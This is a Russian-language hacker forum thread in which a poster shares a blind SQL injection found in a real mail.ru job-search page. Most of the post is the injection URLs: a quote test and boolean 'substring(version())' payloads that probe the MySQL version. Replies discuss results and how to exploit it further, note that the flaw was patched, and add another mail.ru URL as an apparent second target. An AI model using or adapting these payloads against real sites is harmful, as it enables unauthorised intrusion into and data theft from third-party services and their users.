баг на mail.ru

Вот нашол SQL injection на mail.ru
Crekm слепая, без вывода...
внимательно смотрим на формировку наги:

Code:

http://rabota.mail.ru/vac_search/?go=1&from_search=1&query=

Code:

http://rabota.mail.ru/vac_search/?go=1[COLOR=Green][B]'[/B][/COLOR]&from_search=1&query=

смотрим версию мускула:

Code:

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=5--&from_search=1&query=

пятая...

вроди как возможно внедрение SQL кода...

Дальше не докрутил, ибо не силён в подзапросах...

 

Не знаю, какая там 5-ая...

У меня страница

Code:

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=5--&from_search=1&query=

и

Code:

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=4--&from_search=1&query=

одинаковые..

А вот так:

Code:

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=3--&from_search=1&query=

Другой результат...

 

у меня новости меняются.

 

да и не в версии дело, бага то есть...

 

Ну, в случае с маилом, уже не особо удивляет блинд скуля.. Учитывая, что недавно была инъекция с выводом ^^

 

прикрыли о_О

 

Ну да, я cразу зашёл и прикрыл ^^

 

да правда прикрыли!

 

Я это багу нашол недели 3 назад...

 

Смысл ложить такое в паблик =\

 

ну так в приват мну невзяли, приходица в паблике реализоваца)

 

Был бы смысл вообще этой баги чтобы её в приват ложить ))

 

ну если грамотно раскрутьть, то смысл есть)

 

Очень интересно, как ты будешь крутить 3-ию ветку подзапросами )

 

http://realty.mail.ru/msk/res/rflat/?page=-1